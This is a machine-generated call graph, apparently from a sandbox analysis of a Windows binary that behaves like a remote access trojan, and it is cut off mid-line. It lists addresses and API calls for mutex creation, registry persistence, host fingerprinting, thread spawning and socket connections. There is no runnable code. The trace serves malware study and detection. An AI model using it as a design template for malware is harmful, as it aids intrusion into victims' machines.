46161 43a9b7 46176 43a827 26 API calls _Deallocate 46161->46176 46170 444acc EnterCriticalSection 46163->46170 46165 43a9e7 46171 43aa88 46165->46171 46168 43a9c2 std::_Locinfo::_Locinfo_dtor 46170->46165 46173 43aa96 46171->46173 46172 43a9f2 46177 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46172->46177 46173->46172 46178 448416 39 API calls 2 library calls 46173->46178 46175->46161 46176->46168 46177->46168 46178->46173 46179 4339be 46180 4339ca ___BuildCatchObject 46179->46180 46211 4336b3 46180->46211 46182 4339d1 46183 433b24 46182->46183 46186 4339fb 46182->46186 46511 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46183->46511 46185 433b2b 46512 4426be 28 API calls _abort 46185->46512 46188 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46186->46188 46505 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46186->46505 46196 433a9b 46188->46196 46507 43edf4 38 API calls 2 library calls 46188->46507 46189 433b31 46513 442670 28 API calls _abort 46189->46513 46192 433a14 46194 433a1a 46192->46194 46506 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46192->46506 46193 433b39 46222 433c5e 46196->46222 46205 433abd 46205->46185 46206 433ac1 46205->46206 46207 433aca 46206->46207 46509 442661 28 API calls _abort 46206->46509 46510 433842 13 API calls 2 library calls 46207->46510 46210 433ad2 46210->46194 46212 4336bc 46211->46212 46514 433e0a IsProcessorFeaturePresent 46212->46514 46214 4336c8 46515 4379ee 10 API calls 3 library calls 46214->46515 46216 4336cd 46221 4336d1 46216->46221 46516 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46216->46516 46218 4336da 46219 4336e8 46218->46219 46517 437a17 8 API calls 3 library calls 46218->46517 46219->46182 46221->46182 46518 436050 46222->46518 46225 433aa1 46226 443422 46225->46226 46520 44ddc9 46226->46520 46228 433aaa 46231 40d767 46228->46231 46229 44342b 46229->46228 46524 44e0d3 38 API calls 46229->46524 46526 41bce3 LoadLibraryA GetProcAddress 46231->46526 46233 40d783 GetModuleFileNameW 46531 40e168 46233->46531 46235 40d79f 46546 401fbd 46235->46546 46238 401fbd 28 API calls 46239 40d7bd 46238->46239 46550 41afc3 46239->46550 46243 40d7cf 46575 401d8c 46243->46575 46245 40d7d8 46246 40d835 46245->46246 46247 40d7eb 46245->46247 46581 401d64 46246->46581 46833 40e986 111 API calls 46247->46833 46250 40d845 46253 401d64 28 API calls 46250->46253 46251 40d7fd 46252 401d64 28 API calls 46251->46252 46256 40d809 46252->46256 46254 40d864 46253->46254 46586 404cbf 46254->46586 46834 40e937 68 API calls 46256->46834 46257 40d873 46590 405ce6 46257->46590 46260 40d87f 46593 401eef 46260->46593 46261 40d824 46835 40e155 68 API calls 46261->46835 46264 40d88b 46597 401eea 46264->46597 46266 40d894 46268 401eea 26 API calls 46266->46268 46267 401eea 26 API calls 46269 40dc9f 46267->46269 46270 40d89d 46268->46270 46508 433c94 GetModuleHandleW 46269->46508 46271 401d64 28 API calls 46270->46271 46272 40d8a6 46271->46272 46601 401ebd 46272->46601 46274 40d8b1 46275 401d64 28 API calls 46274->46275 46276 40d8ca 46275->46276 46277 401d64 28 API calls 46276->46277 46279 40d8e5 46277->46279 46278 40d946 46280 401d64 28 API calls 46278->46280 46295 40e134 46278->46295 46279->46278 46836 4085b4 46279->46836 46286 40d95d 46280->46286 46282 40d912 46283 401eef 26 API calls 46282->46283 46284 40d91e 46283->46284 46287 401eea 26 API calls 46284->46287 46285 40d9a4 46605 40bed7 46285->46605 46286->46285 46292 4124b7 3 API calls 46286->46292 46289 40d927 46287->46289 46840 4124b7 RegOpenKeyExA 46289->46840 46290 40d9aa 46291 40d82d 46290->46291 46608 41a463 46290->46608 46291->46267 46297 40d988 46292->46297 46916 412902 30 API calls 46295->46916 46296 40d9c5 46299 40da18 46296->46299 46625 40697b 46296->46625 46297->46285 46843 412902 30 API calls 46297->46843 46300 401d64 28 API calls 46299->46300 46303 40da21 46300->46303 46312 40da32 46303->46312 46313 40da2d 46303->46313 46305 40e14a 46917 4112b5 64 API calls ___scrt_fastfail 46305->46917 46306 40d9e4 46844 40699d 30 API calls 46306->46844 46307 40d9ee 46311 401d64 28 API calls 46307->46311 46320 40d9f7 46311->46320 46317 401d64 28 API calls 46312->46317 46847 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46313->46847 46314 40d9e9 46845 4064d0 97 API calls 46314->46845 46318 40da3b 46317->46318 46629 41ae08 46318->46629 46320->46299 46323 40da13 46320->46323 46321 40da46 46633 401e18 46321->46633 46846 4064d0 97 API calls 46323->46846 46325 40da51 46637 401e13 46325->46637 46327 40da5a 46328 401d64 28 API calls 46327->46328 46329 40da63 46328->46329 46330 401d64 28 API calls 46329->46330 46331 40da7d 46330->46331 46332 401d64 28 API calls 46331->46332 46333 40da97 46332->46333 46334 401d64 28 API calls 46333->46334 46336 40dab0 46334->46336 46335 40db1d 46338 40db2c 46335->46338 46343 40dcaa ___scrt_fastfail 46335->46343 46336->46335 46337 401d64 28 API calls 46336->46337 46342 40dac5 _wcslen 46337->46342 46339 40db35 46338->46339 46367 40dbb1 ___scrt_fastfail 46338->46367 46340 401d64 28 API calls 46339->46340 46341 40db3e 46340->46341 46344 401d64 28 API calls 46341->46344 46342->46335 46345 401d64 28 API calls 46342->46345 46907 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46343->46907 46346 40db50 46344->46346 46347 40dae0 46345->46347 46349 401d64 28 API calls 46346->46349 46351 401d64 28 API calls 46347->46351 46350 40db62 46349->46350 46354 401d64 28 API calls 46350->46354 46352 40daf5 46351->46352 46848 40c89e 46352->46848 46353 40dcef 46355 401d64 28 API calls 46353->46355 46357 40db8b 46354->46357 46358 40dd16 46355->46358 46362 401d64 28 API calls 46357->46362 46651 401f66 46358->46651 46360 401e18 26 API calls 46361 40db14 46360->46361 46364 401e13 26 API calls 46361->46364 46365 40db9c 46362->46365 46364->46335 46905 40bc67 46 API calls _wcslen 46365->46905 46366 40dd25 46655 4126d2 RegCreateKeyA 46366->46655 46641 4128a2 46367->46641 46372 40dc45 ctype 46376 401d64 28 API calls 46372->46376 46373 40dbac 46373->46367 46374 401d64 28 API calls 46375 40dd47 46374->46375 46661 43a5e7 46375->46661 46377 40dc5c 46376->46377 46377->46353 46380 40dc70 46377->46380 46382 401d64 28 API calls 46380->46382 46381 40dd5e 46908 41beb0 87 API calls ___scrt_fastfail 46381->46908 46384 40dc7e 46382->46384 46383 40dd81 46386 401f66 28 API calls 46383->46386 46387 41ae08 28 API calls 46384->46387 46389 40dd96 46386->46389 46390 40dc87 46387->46390 46388 40dd65 CreateThread 46388->46383 47308 41c96f 10 API calls 46388->47308 46391 401f66 28 API calls 46389->46391 46906 40e219 112 API calls 46390->46906 46393 40dda5 46391->46393 46665 41a686 46393->46665 46394 40dc8c 46394->46353 46396 40dc93 46394->46396 46396->46291 46398 401d64 28 API calls 46399 40ddb6 46398->46399 46400 401d64 28 API calls 46399->46400 46401 40ddcb 46400->46401 46402 401d64 28 API calls 46401->46402 46403 40ddeb 46402->46403 46404 43a5e7 _strftime 42 API calls 46403->46404 46405 40ddf8 46404->46405 46406 401d64 28 API calls 46405->46406 46407 40de03 46406->46407 46408 401d64 28 API calls 46407->46408 46409 40de14 46408->46409 46410 401d64 28 API calls 46409->46410 46411 40de29 46410->46411 46412 401d64 28 API calls 46411->46412 46413 40de3a 46412->46413 46414 40de41 StrToIntA 46413->46414 46689 409517 46414->46689 46417 401d64 28 API calls 46418 40de5c 46417->46418 46419 40dea1 46418->46419 46420 40de68 46418->46420 46422 401d64 28 API calls 46419->46422 46909 43360d 22 API calls 3 library calls 46420->46909 46424 40deb1 46422->46424 46423 40de71 46425 401d64 28 API calls 46423->46425 46428 40def9 46424->46428 46429 40debd 46424->46429 46426 40de84 46425->46426 46427 40de8b CreateThread 46426->46427 46427->46419 47311 419128 109 API calls 2 library calls 46427->47311 46430 401d64 28 API calls 46428->46430 46910 43360d 22 API calls 3 library calls 46429->46910 46432 40df02 46430->46432 46436 40df6c 46432->46436 46437 40df0e 46432->46437 46433 40dec6 46434 401d64 28 API calls 46433->46434 46435 40ded8 46434->46435 46440 40dedf CreateThread 46435->46440 46438 401d64 28 API calls 46436->46438 46439 401d64 28 API calls 46437->46439 46441 40df75 46438->46441 46442 40df1e 46439->46442 46440->46428 47310 419128 109 API calls 2 library calls 46440->47310 46443 40df81 46441->46443 46444 40dfba 46441->46444 46445 401d64 28 API calls 46442->46445 46447 401d64 28 API calls 46443->46447 46714 41a7a2 GetComputerNameExW GetUserNameW 46444->46714 46448 40df33 46445->46448 46450 40df8a 46447->46450 46911 40c854 32 API calls 46448->46911 46455 401d64 28 API calls 46450->46455 46451 401e18 26 API calls 46452 40dfce 46451->46452 46454 401e13 26 API calls 46452->46454 46458 40dfd7 46454->46458 46459 40df9f 46455->46459 46456 40df46 46457 401e18 26 API calls 46456->46457 46460 40df52 46457->46460 46461 40dfe0 SetProcessDEPPolicy 46458->46461 46462 40dfe3 CreateThread 46458->46462 46468 43a5e7 _strftime 42 API calls 46459->46468 46463 401e13 26 API calls 46460->46463 46461->46462 46464 40e004 46462->46464 46465 40dff8 CreateThread 46462->46465 47279 40e54f 46462->47279 46469 40df5b CreateThread 46463->46469 46466 40e019 46464->46466 46467 40e00d CreateThread 46464->46467 46465->46464 47306 410f36 137 API calls 46465->47306 46471 40e073 46466->46471 46473 401f66 28 API calls 46466->46473 46467->46466 47307 411524 38 API calls ___scrt_fastfail 46467->47307 46470 40dfac 46468->46470 46469->46436 47309 40196b 49 API calls _strftime 46469->47309 46912 40b95c 7 API calls 46470->46912 46725 41246e RegOpenKeyExA 46471->46725 46474 40e046 46473->46474 46913 404c9e 28 API calls 46474->46913 46478 40e053 46480 401f66 28 API calls 46478->46480 46479 40e12a 46737 40cbac 46479->46737 46482 40e062 46480->46482 46481 41ae08 28 API calls 46484 40e0a4 46481->46484 46485 41a686 79 API calls 46482->46485 46728 412584 RegOpenKeyExW 46484->46728 46488 40e067 46485->46488 46489 401eea 26 API calls 46488->46489 46489->46471 46492 401e13 26 API calls 46495 40e0c5 46492->46495 46493 40e0ed DeleteFileW 46494 40e0f4 46493->46494 46493->46495 46497 41ae08 28 API calls 46494->46497 46495->46493 46495->46494 46496 40e0db Sleep 46495->46496 46914 401e07 46496->46914 46499 40e104 46497->46499 46733 41297a RegOpenKeyExW 46499->46733 46501 40e117 46502 401e13 26 API calls 46501->46502 46503 40e121 46502->46503 46504 401e13 26 API calls 46503->46504 46504->46479 46505->46192 46506->46188 46507->46196 46508->46205 46509->46207 46510->46210 46511->46185 46512->46189 46513->46193 46514->46214 46515->46216 46516->46218 46517->46221 46519 433c71 GetStartupInfoW 46518->46519 46519->46225 46521 44dddb 46520->46521 46522 44ddd2 46520->46522 46521->46229 46525 44dcc8 51 API calls 5 library calls 46522->46525 46524->46229 46525->46521 46527 41bd22 LoadLibraryA GetProcAddress 46526->46527 46528 41bd12 GetModuleHandleA GetProcAddress 46526->46528 46529 41bd4b 32 API calls 46527->46529 46530 41bd3b LoadLibraryA GetProcAddress 46527->46530 46528->46527 46529->46233 46530->46529 46918 41a63f FindResourceA 46531->46918 46534 43a88c ___crtLCMapStringA 21 API calls 46535 40e192 _Yarn 46534->46535 46921 401f86 46535->46921 46538 401eef 26 API calls 46539 40e1b8 46538->46539 46540 401eea 26 API calls 46539->46540 46541 40e1c1 46540->46541 46542 43a88c ___crtLCMapStringA 21 API calls 46541->46542 46543 40e1d2 _Yarn 46542->46543 46925 406052 46543->46925 46545 40e205 46545->46235 46547 401fcc 46546->46547 46933 402501 46547->46933 46549 401fea 46549->46238 46551 41afd6 46550->46551 46554 41b048 46551->46554 46563 401eef 26 API calls 46551->46563 46566 401eea 26 API calls 46551->46566 46570 41b046 46551->46570 46938 403b60 28 API calls 46551->46938 46939 41bfa9 28 API calls 46551->46939 46552 401eea 26 API calls 46553 41b078 46552->46553 46555 401eea 26 API calls 46553->46555 46940 403b60 28 API calls 46554->46940 46558 41b080 46555->46558 46560 401eea 26 API calls 46558->46560 46559 41b054 46562 401eef 26 API calls 46559->46562 46561 40d7c6 46560->46561 46571 40e8bd 46561->46571 46564 41b05d 46562->46564 46563->46551 46565 401eea 26 API calls 46564->46565 46567 41b065 46565->46567 46566->46551 46941 41bfa9 28 API calls 46567->46941 46570->46552 46572 40e8ca 46571->46572 46574 40e8da 46572->46574 46942 40200a 26 API calls 46572->46942 46574->46243 46576 40200a 46575->46576 46580 40203a 46576->46580 46943 402654 26 API calls 46576->46943 46578 40202b 46944 4026ba 26 API calls _Deallocate 46578->46944 46580->46245 46582 401d6c 46581->46582 46583 401d74 46582->46583 46945 401fff 28 API calls 46582->46945 46583->46250 46587 404ccb 46586->46587 46946 402e78 46587->46946 46589 404cee 46589->46257 46955 404bc4 46590->46955 46592 405cf4 46592->46260 46594 401efe 46593->46594 46596 401f0a 46594->46596 46964 4021b9 26 API calls 46594->46964 46596->46264 46598 4021b9 46597->46598 46599 4021e8 46598->46599 46965 40262e 26 API calls _Deallocate 46598->46965 46599->46266 46603 401ec9 46601->46603 46602 401ee4 46602->46274 46603->46602 46604 402325 28 API calls 46603->46604 46604->46602 46966 401e8f 46605->46966 46607 40bee1 CreateMutexA GetLastError 46607->46290 46968 41b15b 46608->46968 46610 41a471 46972 412513 RegOpenKeyExA 46610->46972 46613 401eef 26 API calls 46614 41a49f 46613->46614 46615 401eea 26 API calls 46614->46615 46616 41a4a7 46615->46616 46617 41a4fa 46616->46617 46618 412513 31 API calls 46616->46618 46617->46296 46619 41a4cd 46618->46619 46620 41a4d8 StrToIntA 46619->46620 46621 41a4ef 46620->46621 46622 41a4e6 46620->46622 46624 401eea 26 API calls 46621->46624 46977 41c102 28 API calls 46622->46977 46624->46617 46626 40698f 46625->46626 46627 4124b7 3 API calls 46626->46627 46628 406996 46627->46628 46628->46306 46628->46307 46630 41ae1c 46629->46630 46978 40b027 46630->46978 46632 41ae24 46632->46321 46634 401e27 46633->46634 46636 401e33 46634->46636 46987 402121 26 API calls 46634->46987 46636->46325 46638 402121 46637->46638 46639 402150 46638->46639 46988 402718 26 API calls _Deallocate 46638->46988 46639->46327 46642 4128c0 46641->46642 46643 406052 28 API calls 46642->46643 46644 4128d5 46643->46644 46645 401fbd 28 API calls 46644->46645 46646 4128e5 46645->46646 46647 4126d2 29 API calls 46646->46647 46648 4128ef 46647->46648 46649 401eea 26 API calls 46648->46649 46650 4128fc 46649->46650 46650->46372 46652 401f6e 46651->46652 46989 402301 46652->46989 46656 412722 46655->46656 46657 4126eb 46655->46657 46658 401eea 26 API calls 46656->46658 46660 4126fd RegSetValueExA RegCloseKey 46657->46660 46659 40dd3b 46658->46659 46659->46374 46660->46656 46662 43a600 _strftime 46661->46662 46993 43993e 46662->46993 46666 41a737 46665->46666 46667 41a69c GetLocalTime 46665->46667 46669 401eea 26 API calls 46666->46669 46668 404cbf 28 API calls 46667->46668 46670 41a6de 46668->46670 46671 41a73f 46669->46671 46672 405ce6 28 API calls 46670->46672 46673 401eea 26 API calls 46671->46673 46674 41a6ea 46672->46674 46675 40ddaa 46673->46675 47027 4027cb 46674->47027 46675->46398 46677 41a6f6 46678 405ce6 28 API calls 46677->46678 46679 41a702 46678->46679 47030 406478 76 API calls 46679->47030 46681 41a710 46682 401eea 26 API calls 46681->46682 46683 41a71c 46682->46683 46684 401eea 26 API calls 46683->46684 46685 41a725 46684->46685 46686 401eea 26 API calls 46685->46686 46687 41a72e 46686->46687 46688 401eea 26 API calls 46687->46688 46688->46666 46690 409536 _wcslen 46689->46690 46691 409541 46690->46691 46692 409558 46690->46692 46694 40c89e 32 API calls 46691->46694 46693 40c89e 32 API calls 46692->46693 46695 409560 46693->46695 46696 409549 46694->46696 46697 401e18 26 API calls 46695->46697 46698 401e18 26 API calls 46696->46698 46699 40956e 46697->46699 46700 409553 46698->46700 46701 401e13 26 API calls 46699->46701 46703 401e13 26 API calls 46700->46703 46702 409576 46701->46702 47050 40856b 28 API calls 46702->47050 46704 4095ad 46703->46704 47035 409837 46704->47035 46707 409588 47051 4028cf 46707->47051 46710 409593 46711 401e18 26 API calls 46710->46711 46712 40959d 46711->46712 46713 401e13 26 API calls 46712->46713 46713->46700 47070 403b40 46714->47070 46718 41a7fd 46719 4028cf 28 API calls 46718->46719 46720 41a807 46719->46720 46721 401e13 26 API calls 46720->46721 46722 41a810 46721->46722 46723 401e13 26 API calls 46722->46723 46724 40dfc3 46723->46724 46724->46451 46726 40e08b 46725->46726 46727 41248f RegQueryValueExA RegCloseKey 46725->46727 46726->46479 46726->46481 46727->46726 46729 4125b0 RegQueryValueExW RegCloseKey 46728->46729 46730 4125dd 46728->46730 46729->46730 46731 403b40 28 API calls 46730->46731 46732 40e0ba 46731->46732 46732->46492 46734 412992 RegDeleteValueW 46733->46734 46735 4129a6 46733->46735 46734->46735 46736 4129a2 46734->46736 46735->46501 46736->46501 46738 40cbc5 46737->46738 46739 41246e 3 API calls 46738->46739 46740 40cbcc 46739->46740 46741 40cbeb 46740->46741 47103 401602 46740->47103 46745 413fd4 46741->46745 46743 40cbd9 47106 4127d5 RegCreateKeyA 46743->47106 46746 413feb 46745->46746 47123 41aa73 46746->47123 46748 413ff6 46749 401d64 28 API calls 46748->46749 46750 41400f 46749->46750 46751 43a5e7 _strftime 42 API calls 46750->46751 46752 41401c 46751->46752 46753 414021 Sleep 46752->46753 46754 41402e 46752->46754 46753->46754 46755 401f66 28 API calls 46754->46755 46756 41403d 46755->46756 46757 401d64 28 API calls 46756->46757 46758 41404b 46757->46758 46759 401fbd 28 API calls 46758->46759 46760 414053 46759->46760 46761 41afc3 28 API calls 46760->46761 46762 41405b 46761->46762 47127 404262 WSAStartup 46762->47127 46764 414065 46765 401d64 28 API calls 46764->46765 46766 41406e 46765->46766 46767 401d64 28 API calls 46766->46767 46792 4140ed 46766->46792 46768 414087 46767->46768 46771 401d64 28 API calls 46768->46771 46769 401d64 28 API calls 46769->46792 46770 401fbd 28 API calls 46770->46792 46772 414098 46771->46772 46774 401d64 28 API calls 46772->46774 46773 41afc3 28 API calls 46773->46792 46775 4140a9 46774->46775 46777 401d64 28 API calls 46775->46777 46776 4085b4 28 API calls 46776->46792 46778 4140ba 46777->46778 46779 401d64 28 API calls 46778->46779 46781 4140cb 46779->46781 46780 401eef 26 API calls 46780->46792 46783 401d64 28 API calls 46781->46783 46782 401eea 26 API calls 46782->46792 46784 4140dd 46783->46784 47230 404101 87 API calls 46784->47230 46787 414244 WSAGetLastError 47231 41bc76 30 API calls 46787->47231 46792->46769 46792->46770 46792->46773 46792->46776 46792->46780 46792->46782 46792->46787 46794 41a686 79 API calls 46792->46794 46796 404cbf 28 API calls 46792->46796 46797 401d8c 26 API calls 46792->46797 46798 43a5e7 _strftime 42 API calls 46792->46798 46800 405ce6 28 API calls 46792->46800 46801 4027cb 28 API calls 46792->46801 46802 401f66 28 API calls 46792->46802 46808 412513 31 API calls 46792->46808 46832 41446f 46792->46832 47128 413f9a 46792->47128 47134 4041f1 46792->47134 47141 404915 46792->47141 47156 40428c connect 46792->47156 47216 4047eb WaitForSingleObject 46792->47216 47232 404c9e 28 API calls 46792->47232 47233 41a96d GlobalMemoryStatusEx 46792->47233 47234 413683 50 API calls 46792->47234 47235 4082dc 28 API calls 46792->47235 47236 440c51 26 API calls 46792->47236 47237 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46792->47237 46794->46792 46796->46792 46797->46792 46799 414b80 Sleep 46798->46799 46799->46792 46800->46792 46801->46792 46802->46792 46808->46792 46809 403b40 28 API calls 46809->46832 46812 401d64 28 API calls 46813 4144ed GetTickCount 46812->46813 47240 41ad46 28 API calls 46813->47240 46816 41ad46 28 API calls 46816->46832 46819 41aec8 28 API calls 46819->46832 46821 40275c 28 API calls 46821->46832 46822 405ce6 28 API calls 46822->46832 46823 4027cb 28 API calls 46823->46832 46825 401eea 26 API calls 46825->46832 46826 401e13 26 API calls 46826->46832 46829 401f66 28 API calls 46829->46832 46830 41a686 79 API calls 46830->46832 46831 414b22 CreateThread 46831->46832 47272 419e89 102 API calls 46831->47272 46832->46792 46832->46809 46832->46812 46832->46816 46832->46819 46832->46821 46832->46822 46832->46823 46832->46825 46832->46826 46832->46829 46832->46830 46832->46831 47238 40cbf1 6 API calls 46832->47238 47239 41adee 28 API calls 46832->47239 47241 41aca0 GetLastInputInfo GetTickCount 46832->47241 47242 41ac52 30 API calls ___scrt_fastfail 46832->47242 47243 40e679 29 API calls 46832->47243 47244 4027ec 28 API calls 46832->47244 47245 404468 59 API calls _Yarn 46832->47245 47246 4045d5 111 API calls ___crtLCMapStringA 46832->47246 47247 40a767 84 API calls 46832->47247 46833->46251 46834->46261 46837 4085c0 46836->46837 46838 402e78 28 API calls 46837->46838 46839 4085e4 46838->46839 46839->46282 46841 4124e1 RegQueryValueExA RegCloseKey 46840->46841 46842 41250b 46840->46842 46841->46842 46842->46278 46843->46285 46844->46314 46845->46307 46846->46299 46847->46312 46849 40c8ba 46848->46849 46850 40c8da 46849->46850 46851 40c90f 46849->46851 46853 40c8d0 46849->46853 47273 41a74b 29 API calls 46850->47273 46854 41b15b 2 API calls 46851->46854 46852 40ca03 GetLongPathNameW 46856 403b40 28 API calls 46852->46856 46853->46852 46857 40c914 46854->46857 46859 40ca18 46856->46859 46860 40c918 46857->46860 46861 40c96a 46857->46861 46858 40c8e3 46862 401e18 26 API calls 46858->46862 46863 403b40 28 API calls 46859->46863 46865 403b40 28 API calls 46860->46865 46864 403b40 28 API calls 46861->46864 46866 40c8ed 46862->46866 46867 40ca27 46863->46867 46868 40c978 46864->46868 46869 40c926 46865->46869 46870 401e13 26 API calls 46866->46870 47276 40cc37 28 API calls 46867->47276 46874 403b40 28 API calls 46868->46874 46875 403b40 28 API calls 46869->46875 46870->46853 46872 40ca3a 47277 402860 28 API calls 46872->47277 46877 40c98e 46874->46877 46878 40c93c 46875->46878 46876 40ca45 47278 402860 28 API calls 46876->47278 47275 402860 28 API calls 46877->47275 47274 402860 28 API calls 46878->47274 46882 40ca4f 46886 401e13 26 API calls 46882->46886 46883 40c999 46887 401e18 26 API calls 46883->46887 46884 40c947 46885 401e18 26 API calls 46884->46885 46889 40c952 46885->46889 46890 40ca59 46886->46890 46888 40c9a4 46887->46888 46891 401e13 26 API calls 46888->46891 46892 401e13 26 API calls 46889->46892 46893 401e13 26 API calls 46890->46893 46895 40c9ad 46891->46895 46896 40c95b 46892->46896 46894 40ca62 46893->46894 46897 401e13 26 API calls 46894->46897 46898 401e13 26 API calls 46895->46898 46899 401e13 26 API calls 46896->46899 46900 40ca6b 46897->46900 46898->46866 46899->46866 46901 401e13 26 API calls 46900->46901 46902 40ca74 46901->46902 46903 401e13 26 API calls 46902->46903 46904 40ca7d 46903->46904 46904->46360 46905->46373 46906->46394 46907->46353 46908->46388 46909->46423 46910->46433 46911->46456 46912->46444 46913->46478 46915 401e0c 46914->46915 46916->46305 46919 40e183 46918->46919 46920 41a65c LoadResource LockResource SizeofResource 46918->46920 46919->46534 46920->46919 46922 401f8e 46921->46922 46928 402325 46922->46928 46924 401fa4 46924->46538 46926 401f86 28 API calls 46925->46926 46927 406066 46926->46927 46927->46545 46929 40232f 46928->46929 46931 40233a 46929->46931 46932 40294a 28 API calls 46929->46932 46931->46924 46932->46931 46934 40250d 46933->46934 46936 40252b 46934->46936 46937 40261a 28 API calls 46934->46937 46936->46549 46937->46936 46938->46551 46939->46551 46940->46559 46941->46570 46942->46574 46943->46578 46944->46580 46947 402e85 46946->46947 46948 402ea9 46947->46948 46949 402e98 46947->46949 46951 402eae 46947->46951 46948->46589 46953 403445 28 API calls 46949->46953 46951->46948 46954 40225b 26 API calls 46951->46954 46953->46948 46954->46948 46956 404bd0 46955->46956 46959 40245c 46956->46959 46958 404be4 46958->46592 46960 402469 46959->46960 46962 402478 46960->46962 46963 402ad3 28 API calls 46960->46963 46962->46958 46963->46962 46964->46596 46965->46599 46967 401e94 46966->46967 46969 41b183 46968->46969 46970 41b168 GetCurrentProcess IsWow64Process 46968->46970 46969->46610 46970->46969 46971 41b17f 46970->46971 46971->46610 46973 412541 RegQueryValueExA RegCloseKey 46972->46973 46974 412569 46972->46974 46973->46974 46975 401f66 28 API calls 46974->46975 46976 41257e 46975->46976 46976->46613 46977->46621 46979 40b02f 46978->46979 46982 40b04b 46979->46982 46981 40b045 46981->46632 46983 40b055 46982->46983 46985 40b060 46983->46985 46986 40b138 28 API calls 46983->46986 46985->46981 46986->46985 46987->46636 46988->46639 46990 40230d 46989->46990 46991 402325 28 API calls 46990->46991 46992 401f80 46991->46992 46992->46366 47011 43a545 46993->47011 46995 43998b 47020 4392de 38 API calls 3 library calls 46995->47020 46997 439950 46997->46995 46998 439965 46997->46998 47010 40dd54 46997->47010 47018 445354 20 API calls _abort 46998->47018 47000 43996a 47019 43a827 26 API calls _Deallocate 47000->47019 47003 439997 47004 4399c6 47003->47004 47021 43a58a 42 API calls __Tolower 47003->47021 47007 439a32 47004->47007 47022 43a4f1 26 API calls 2 library calls 47004->47022 47023 43a4f1 26 API calls 2 library calls 47007->47023 47008 439af9 _strftime 47008->47010 47024 445354 20 API calls _abort 47008->47024 47010->46381 47010->46383 47012 43a54a 47011->47012 47013 43a55d 47011->47013 47025 445354 20 API calls _abort 47012->47025 47013->46997 47015 43a54f 47026 43a827 26 API calls _Deallocate 47015->47026 47017 43a55a 47017->46997 47018->47000 47019->47010 47020->47003 47021->47003 47022->47007 47023->47008 47024->47010 47025->47015 47026->47017 47031 401e9b 47027->47031 47029 4027d9 47029->46677 47030->46681 47032 401ea7 47031->47032 47033 40245c 28 API calls 47032->47033 47034 401eb9 47033->47034 47034->47029 47036 409855 47035->47036 47037 4124b7 3 API calls 47036->47037 47038 40985c 47037->47038 47039 409870 47038->47039 47040 40988a 47038->47040 47041 4095cf 47039->47041 47042 409875 47039->47042 47056 4082dc 28 API calls 47040->47056 47041->46417 47054 4082dc 28 API calls 47042->47054 47045 409898 47057 4098a5 85 API calls 47045->47057 47046 409883 47055 409959 29 API calls 47046->47055 47049 409888 47049->47041 47050->46707 47061 402d8b 47051->47061 47053 4028dd 47053->46710 47054->47046 47055->47049 47058 40999f 130 API calls 47055->47058 47056->47045 47057->47041 47059 4099b5 53 API calls 47057->47059 47060 4099a9 125 API calls 47057->47060 47062 402d97 47061->47062 47065 4030f7 47062->47065 47064 402dab 47064->47053 47066 403101 47065->47066 47068 403115 47066->47068 47069 4036c2 28 API calls 47066->47069 47068->47064 47069->47068 47071 403b48 47070->47071 47077 403b7a 47071->47077 47074 403cbb 47086 403dc2 47074->47086 47076 403cc9 47076->46718 47078 403b86 47077->47078 47081 403b9e 47078->47081 47080 403b5a 47080->47074 47082 403ba8 47081->47082 47084 403bb3 47082->47084 47085 403cfd 28 API calls 47082->47085 47084->47080 47085->47084 47087 403dce 47086->47087 47090 402ffd 47087->47090 47089 403de3 47089->47076 47091 40300e 47090->47091 47096 4032a4 47091->47096 47095 40302e 47095->47089 47097 4032b0 47096->47097 47098 40301a 47096->47098 47102 4032b6 28 API calls 47097->47102 47098->47095 47101 4035e8 28 API calls 47098->47101 47101->47095 47109 4395ba 47103->47109 47107 412814 47106->47107 47108 4127ed RegSetValueExA RegCloseKey 47106->47108 47107->46741 47108->47107 47112 43953b 47109->47112 47111 401608 47111->46743 47113 43954a 47112->47113 47114 43955e 47112->47114 47120 445354 20 API calls _abort 47113->47120 47118 43955a __alldvrm 47114->47118 47122 447601 11 API calls 2 library calls 47114->47122 47117 43954f 47121 43a827 26 API calls _Deallocate 47117->47121 47118->47111 47120->47117 47121->47118 47122->47118 47124 41aab9 _Yarn ___scrt_fastfail 47123->47124 47125 401f66 28 API calls 47124->47125 47126 41ab2e 47125->47126 47126->46748 47127->46764 47129 413fb3 WSASetLastError 47128->47129 47130 413fa9 47128->47130 47129->46792 47248 413e37 35 API calls ___std_exception_copy 47130->47248 47132 413fae 47132->47129 47135 404206 socket 47134->47135 47136 4041fd 47134->47136 47138 404220 47135->47138 47139 404224 CreateEventW 47135->47139 47249 404262 WSAStartup 47136->47249 47138->46792 47139->46792 47140 404202 47140->47135 47140->47138 47142 4049b1 47141->47142 47143 40492a 47141->47143 47142->46792 47144 404933 47143->47144 47145 404987 CreateEventA CreateThread 47143->47145 47146 404942 GetLocalTime 47143->47146 47144->47145 47145->47142 47252 404b1d 47145->47252 47250 41ad46 28 API calls 47146->47250 47148 40495b 47251 404c9e 28 API calls 47148->47251 47150 404968 47151 401f66 28 API calls 47150->47151 47152 404977 47151->47152 47153 41a686 79 API calls 47152->47153 47154 40497c 47153->47154 47155 401eea 26 API calls 47154->47155 47155->47145 47157 4043e1 47156->47157 47158 4042b3 47156->47158 47159 4043e7 WSAGetLastError 47157->47159 47210 404343 47157->47210 47160 4042e8 47158->47160 47162 404cbf 28 API calls 47158->47162 47158->47210 47161 4043f7 47159->47161 47159->47210 47256 420151 27 API calls 47160->47256 47163 4042f7 47161->47163 47164 4043fc 47161->47164 47166 4042d4 47162->47166 47169 401f66 28 API calls 47163->47169 47267 41bc76 30 API calls 47164->47267 47170 401f66 28 API calls 47166->47170 47168 4042f0 47168->47163 47172 404306 47168->47172 47173 404448 47169->47173 47174 4042e3 47170->47174 47171 40440b 47268 404c9e 28 API calls 47171->47268 47179 404315 47172->47179 47180 40434c 47172->47180 47176 401f66 28 API calls 47173->47176 47177 41a686 79 API calls 47174->47177 47181 